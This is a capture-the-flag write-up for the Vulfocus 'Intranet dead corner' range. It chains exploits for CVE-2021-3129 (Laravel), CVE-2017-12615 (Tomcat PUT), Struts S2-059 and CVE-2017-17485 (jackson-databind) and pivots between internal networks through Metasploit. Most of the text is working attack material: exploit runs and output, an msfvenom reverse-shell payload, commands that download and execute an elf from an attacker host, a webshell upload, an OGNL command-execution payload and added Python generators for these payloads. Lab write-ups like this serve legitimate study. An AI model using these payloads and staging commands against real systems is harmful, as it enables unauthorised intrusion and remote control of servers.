Vulfocus range: "Intranet dead corner" scenario writeup
1. Initial entry
Version: Laravel v8.41.0
Vulnerability: CVE-2021-3129, remote code execution through the Ignition debug page (Laravel running with APP_DEBUG=true)
Exploit used:
https://github.com/zhzyker/CVE-2021-3129
[root@lyqzitm4zttepqpb-0724445 CVE-2021-3129]# python3 exp.py http://123.58.236.76:53681/
[*] Try to use Laravel/RCE1 for exploitation.
[+]exploit:
[*] Laravel/RCE1 Result:
[*] Try to use Laravel/RCE2 for exploitation.
[+]exploit:
[*] Laravel/RCE2 Result:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Try to use Laravel/RCE3 for exploitation.
[+]exploit:
[*] Laravel/RCE3 Result:
[*] Try to use Laravel/RCE4 for exploitation.
[+]exploit:
[*] Laravel/RCE4 Result:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Try to use Laravel/RCE5 for exploitation.
[+]exploit:
[*] Laravel/RCE5 Result:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Try to use Laravel/RCE6 for exploitation.
[+]exploit:
[*] Laravel/RCE6 Result:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Try to use Laravel/RCE7 for exploitation.
[+]exploit:
[*] Laravel/RCE7 Result:
[*] Try to use Monolog/RCE1 for exploitation.
[+]exploit:
[*] Monolog/RCE1 Result:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Try to use Monolog/RCE2 for exploitation.
[+]exploit:
[*] Monolog/RCE2 Result:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Try to use Monolog/RCE3 for exploitation.
[+]exploit:
[*] Monolog/RCE3 Result:
[*] Try to use Monolog/RCE4 for exploitation.
[+]exploit:
[*] Monolog/RCE4 Result:
Exploitation succeeds: several of the chains run the id command. Change the command in the RCE2 chain to ls /tmp to get the flag.
The displayed output is missing a closing } at the end.
Next, get a Meterpreter session.
Generate a Linux payload with msfvenom:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xxxx -f elf > xxxx.elf
Start a handler in msf for the linux/x86/meterpreter/reverse_tcp payload.
In the directory holding the .elf, start a web server so the target can download it:
python3 -m http.server 8008
Edit the command in CVE-2021-3129/exp.py (it appears in several places) to:
curl -O http://xxxxxx:8008/8091.elf
chmod 777 8091.elf
./8091.elf
Session established.
Add routes.
Two internal networks are found:
192.120.2.0/24 (this segment only connects the target to the range infrastructure; no targets on it)
192.120.4.0/24
2. Roaming the intranet
Use the auxiliary/scanner/portscan/tcp module to probe 192.120.4.0/24.
192.120.4.2:8080 is found.
meterpreter > background
msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set rhosts 192.120.4.0/24
rhosts => 192.120.4.0/24
msf6 auxiliary(scanner/portscan/tcp) > set ports 22,23,80,443,8080,8081,3389,445,143,6379
ports => 22,23,80,443,8080,8081,3389,445,143,6379
msf6 auxiliary(scanner/portscan/tcp) > set threads 20
threads => 20
msf6 auxiliary(scanner/portscan/tcp) > run
[+] 192.120.4.2: - 192.120.4.2:8080 - TCP OPEN
[+] 192.120.4.3: - 192.120.4.3:80 - TCP OPEN
[+] 192.120.4.1: - 192.120.4.1:80 - TCP OPEN
[*] 192.120.4.0/24: - Scanned 41 of 256 hosts (16% complete)
[*] 192.120.4.0/24: - Scanned 56 of 256 hosts (21% complete)
[*] 192.120.4.0/24: - Scanned 80 of 256 hosts (31% complete)
[*] 192.120.4.0/24: - Scanned 104 of 256 hosts (40% complete)
[*] 192.120.4.0/24: - Scanned 128 of 256 hosts (50% complete)
[*] 192.120.4.0/24: - Scanned 158 of 256 hosts (61% complete)
[*] 192.120.4.0/24: - Scanned 184 of 256 hosts (71% complete)
[*] 192.120.4.0/24: - Scanned 205 of 256 hosts (80% complete)
[*] 192.120.4.0/24: - Scanned 233 of 256 hosts (91% complete)
[*] 192.120.4.0/24: - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
Use the auxiliary/server/socks_proxy module to start a SOCKS5 proxy, and browse to 192.120.4.2:8080 through it.
Proxy cmd.exe through SocksCap64 and scan 192.120.4.2:8080 with vulmap.
CVE-2017-12615 is present (Tomcat with readonly=false on the DefaultServlet, so an HTTP PUT can write a JSP into the webroot).
Upload a Godzilla JSP webshell.
Still with cmd.exe proxied through SocksCap64:
curl -v -X PUT --data-binary @shell.jsp "http://192.120.4.2:8080/shell.jsp/"
Set the proxy in Godzilla, then connect.
Got the flag on the second machine.
Checking the interfaces shows the 192.120.1.0/24 segment.
Upload the msf payload and get a session.
Add a route for 192.120.1.0/24.
Scan 192.120.1.0/24; 192.120.1.3:8080 is found.
Open it in the browser.
Testing shows S2-059 (CVE-2019-0230, OGNL double evaluation of a forced tag attribute).
Burp is needed to send the request.
The browser sends its traffic to Burp, and Burp forwards it through the msf SOCKS proxy (point Burp's SOCKS proxy setting under Connections at the socks_proxy listener).
Send the payload to get the flag. The captured request below carries Host 192.120.1.2 although the scan found 192.120.1.3; it is reproduced as captured.
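Added example, not from the original writeup: a small Python probe for CVE-2017-12615 that tries the known path suffixes which push a PUT past the JSP servlet mapping, then confirms with a GET that the file really landed under the intended name (a 201 on its own only proves the server accepted the write somewhere). The mock Tomcat at the bottom is a constructed stand-in that behaves like a Linux DefaultServlet with readonly=false, where only the trailing-slash variant lands, so the probe runs offline; against the range it has to go through the msf socks_proxy (proxychains or SocksCap64), since http.client has no SOCKS support of its own.

```python
import threading
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Suffixes that keep the request away from the JSP servlet mapping so the
# DefaultServlet handles the PUT. "/" works on Linux and Windows; the other two
# rely on Windows filename normalisation and are listed so the probe reports them.
BYPASS_SUFFIXES = ("/", "%20", "::$DATA")


def put_file(host, port, name, body, suffix="/"):
    """PUT body to /<name><suffix>; return the HTTP status code."""
    conn = HTTPConnection(host, port, timeout=5)
    conn.request("PUT", f"/{name}{suffix}", body=body,
                 headers={"Content-Type": "application/octet-stream"})
    resp = conn.getresponse()
    resp.read()
    conn.close()
    return resp.status


def get_file(host, port, name):
    """GET /<name>; return (status, body)."""
    conn = HTTPConnection(host, port, timeout=5)
    conn.request("GET", f"/{name}")
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    return resp.status, data


def probe(host, port, name="probe.jsp", marker=b"<%-- cve-2017-12615 probe --%>"):
    """Return the first suffix whose PUT is accepted AND whose content is then
    served back under the plain name, or None. Accepted-but-misnamed uploads
    (e.g. a literal "probe.jsp%20" file on Linux) are rejected by the GET check."""
    for suffix in BYPASS_SUFFIXES:
        if put_file(host, port, name, marker, suffix) in (201, 204):
            status, body = get_file(host, port, name)
            if status == 200 and body == marker:
                return suffix
    return None


class _MockTomcat(BaseHTTPRequestHandler):
    """Constructed stand-in for a Linux Tomcat with readonly=false. Not real
    Tomcat code: it refuses PUT on the .jsp mapping, strips only a trailing "/"
    when storing, and serves stored files back on GET."""
    files = {}

    def do_PUT(self):
        if self.path.endswith(".jsp"):
            self.send_response(405)
            self.end_headers()
            return
        path = self.path[:-1] if self.path.endswith("/") else self.path
        length = int(self.headers.get("Content-Length", 0))
        self.files[path] = self.rfile.read(length)
        self.send_response(201)
        self.end_headers()

    def do_GET(self):
        data = self.files.get(self.path)
        self.send_response(200 if data is not None else 404)
        self.end_headers()
        if data is not None:
            self.wfile.write(data)

    def log_message(self, *args):
        pass


def run_demo():
    """Start the mock on a free port, run the probe against it, report results."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), _MockTomcat)
    port = srv.server_address[1]
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        direct = put_file("127.0.0.1", port, "direct.jsp", b"x", suffix="")
        return {"direct_put": direct, "working_suffix": probe("127.0.0.1", port)}
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(run_demo())
```

Against the real target, remove the probe file afterwards (a DELETE works when PUT does) and keep the marker harmless; the point of the GET round-trip is that it is the only evidence the JSP will actually be executed under the name you intend.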
POST /index.action HTTP/1.1
Host: 192.120.1.2:8080
Content-Length: 586
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.120.1.2:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.120.1.2:8080/index.action
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=EBD7FC6F70573BD03F46F8E43E2DBC91
Connection: close
skillName=%25%7b%23_memberAccess.allowPrivateAccess%3Dtrue%2C%23_memberAccess.allowStaticMethodAccess%3Dtrue%2C%23_memberAccess.excludedClasses%3D%23_memberAccess.acceptProperties%2C%23_memberAccess.excludedPackageNamePatterns%3D%23_memberAccess.acceptProperties%2C%23res%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D%40java.lang.Runtime%40getRuntime()%2C%23s%3Dnew%20java.util.Scanner(%23a.exec('ls%20%2Ftmp').getInputStream()).useDelimiter('%5C%5C%5C%5CA')%2C%23str%3D%23s.hasNext()%3F%23s.next()%3A''%2C%23res.print(%23str)%2C%23res.close()%0A%7d
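Added example, not from the original writeup: the OGNL payload above, parameterised on the command and URL-encoded the way the form body needs, plus a decoder that reads a captured body back. The template is the one in the request above; the assumptions are that the injectable parameter is skillName and that, as S2-059 requires (Struts 2.0.0 to 2.5.20), the application puts it into a tag attribute that is double-evaluated. The output is the body to paste into Burp Repeater.

```python
from urllib.parse import quote, unquote_plus

# OGNL from the request above; {cmd} is the only variable part. The delimiter
# '\\A' reaches Java as the regex \A, so Scanner hands back the whole output
# as a single token.
OGNL_TEMPLATE = (
    "%{{"
    "#_memberAccess.allowPrivateAccess=true,"
    "#_memberAccess.allowStaticMethodAccess=true,"
    "#_memberAccess.excludedClasses=#_memberAccess.acceptProperties,"
    "#_memberAccess.excludedPackageNamePatterns=#_memberAccess.acceptProperties,"
    "#res=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),"
    "#a=@java.lang.Runtime@getRuntime(),"
    "#s=new java.util.Scanner(#a.exec('{cmd}').getInputStream()).useDelimiter('\\\\A'),"
    "#str=#s.hasNext()?#s.next():'',"
    "#res.print(#str),#res.close()"
    "}}"
)

# The body exactly as captured in the request above, used to exercise the decoder.
CAPTURED_BODY = (
    "skillName=%25%7b%23_memberAccess.allowPrivateAccess%3Dtrue%2C%23_memberAccess."
    "allowStaticMethodAccess%3Dtrue%2C%23_memberAccess.excludedClasses%3D%23_memberAccess."
    "acceptProperties%2C%23_memberAccess.excludedPackageNamePatterns%3D%23_memberAccess."
    "acceptProperties%2C%23res%3D%40org.apache.struts2.ServletActionContext%40getResponse()."
    "getWriter()%2C%23a%3D%40java.lang.Runtime%40getRuntime()%2C%23s%3Dnew%20java.util."
    "Scanner(%23a.exec('ls%20%2Ftmp').getInputStream()).useDelimiter('%5C%5C%5C%5CA')%2C"
    "%23str%3D%23s.hasNext()%3F%23s.next()%3A''%2C%23res.print(%23str)%2C%23res.close()%0A%7d"
)


def build_s2_059_body(cmd, param="skillName"):
    """application/x-www-form-urlencoded body carrying the OGNL for cmd.
    Runtime.exec(String) splits cmd on whitespace and starts no shell, so
    pipes or redirects need an explicit bash -c wrapper (and no single quotes)."""
    if "'" in cmd:
        raise ValueError("a single quote would terminate the OGNL string literal")
    return f"{param}={quote(OGNL_TEMPLATE.format(cmd=cmd), safe='')}"


def decode_body(body):
    """Split param=value and URL-decode the value, for reading a captured request."""
    param, _, value = body.partition("=")
    return param, unquote_plus(value)


def command_in(body):
    """Pull the argument of #a.exec('...') out of a body, or None if absent."""
    _, ognl = decode_body(body)
    start = ognl.find("#a.exec('")
    if start < 0:
        return None
    start += len("#a.exec('")
    return ognl[start:ognl.index("')", start)]


if __name__ == "__main__":
    print(build_s2_059_body("id"))
    print("captured request runs:", command_in(CAPTURED_BODY))
```

The captured payload escapes the delimiter as '\\\\A' (four backslashes), which Java sees as the regex \\A, a literal backslash followed by A; it never matches, so Scanner still returns everything in one token. Either form works, but '\\A' is the intended one.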
Get an msf session the same way as before:
wget the elf file,
chmod it executable,
run it to get the session.
Add a route and scan 192.120.3.0/24.
192.120.3.2:8080 is found.
3. CVE-2017-17485
After some testing the vulnerability turns out to be CVE-2017-17485 (jackson-databind with default typing enabled: a FileSystemXmlApplicationContext gadget loads a Spring bean definition from an attacker-controlled URL, and the SpEL in that definition runs a command).
Create spel.xml:
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder">
<constructor-arg>
<array>
<value>wget</value>
<value>9135gi.dnslog.cn</value>
</array>
</constructor-arg>
<property name="any" value="#{ pb.start() }"/>
</bean>
</beans>
python3 -m http.server 8087
Serve spel.xml on port 8087 so the target can fetch it from the VPS, then send:
POST /exploit HTTP/1.1
Host: 192.120.3.2:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 143
{
"param": [
"org.springframework.context.support.FileSystemXmlApplicationContext",
"http://VPS-IP:8087/spel.xml"
]
}
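Added example, not from the original writeup: a generator for the spel.xml above and for the JSON request that makes the target load it, with the argv and the XML URL as parameters, plus a read-back check so the file can be confirmed before it is served. It assumes what the page already relies on, namely that the /exploit endpoint feeds ["<class>", "<constructor argument>"] into jackson-databind with default typing; VPS-IP stays a placeholder.

```python
import json
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

BEANS_NS = "http://www.springframework.org/schema/beans"
XSI_NS = "http://www.w3.org/2001/XMLSchema-instance"
# Gadget class from the request above; Java class names are case-sensitive.
GADGET = "org.springframework.context.support.FileSystemXmlApplicationContext"


def build_spel_xml(argv):
    """Bean definition that runs argv via ProcessBuilder when the context loads.
    ProcessBuilder takes an argv array and starts no shell, so "wget host" is
    one program with one argument; chaining needs ["bash", "-c", "..."]."""
    values = "\n".join(f"        <value>{escape(a)}</value>" for a in argv)
    return f"""<beans xmlns="{BEANS_NS}"
       xmlns:xsi="{XSI_NS}"
       xsi:schemaLocation="{BEANS_NS} {BEANS_NS}/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder">
    <constructor-arg>
      <array>
{values}
      </array>
    </constructor-arg>
    <!-- the property name does not matter: SpEL evaluates pb.start() before
         Spring looks for a setter, so the command runs even though the set fails -->
    <property name="any" value="#{{ pb.start() }}"/>
  </bean>
</beans>
"""


def parse_argv(xml_text):
    """Read the argv back out of a generated spel.xml (sanity check before serving)."""
    root = ET.fromstring(xml_text)
    ns = {"b": BEANS_NS}
    return [v.text for v in root.findall("b:bean/b:constructor-arg/b:array/b:value", ns)]


def build_request(host, xml_url, path="/exploit"):
    """Raw HTTP request text for the /exploit POST, with a correct Content-Length."""
    body = json.dumps({"param": [GADGET, xml_url]})
    headers = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/json",
        f"Content-Length: {len(body.encode())}",
        "Connection: close",
    ]
    return "\r\n".join(headers) + "\r\n\r\n" + body


if __name__ == "__main__":
    xml = build_spel_xml(["wget", "9135gi.dnslog.cn"])
    print(xml)
    print(build_request("192.120.3.2:8080", "http://VPS-IP:8087/spel.xml"))
```

To stage the msf elf the same way the earlier hosts were handled, pass argv such as ["bash", "-c", "wget http://VPS-IP:8088/x.elf -O /tmp/x && chmod +x /tmp/x && /tmp/x"]; the dnslog argv is only useful as a blind-execution check.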
Get an msf session and the flag.
python3 -m http.server 8088 (port 8088 serves the elf file)
Session established; the last flag is obtained.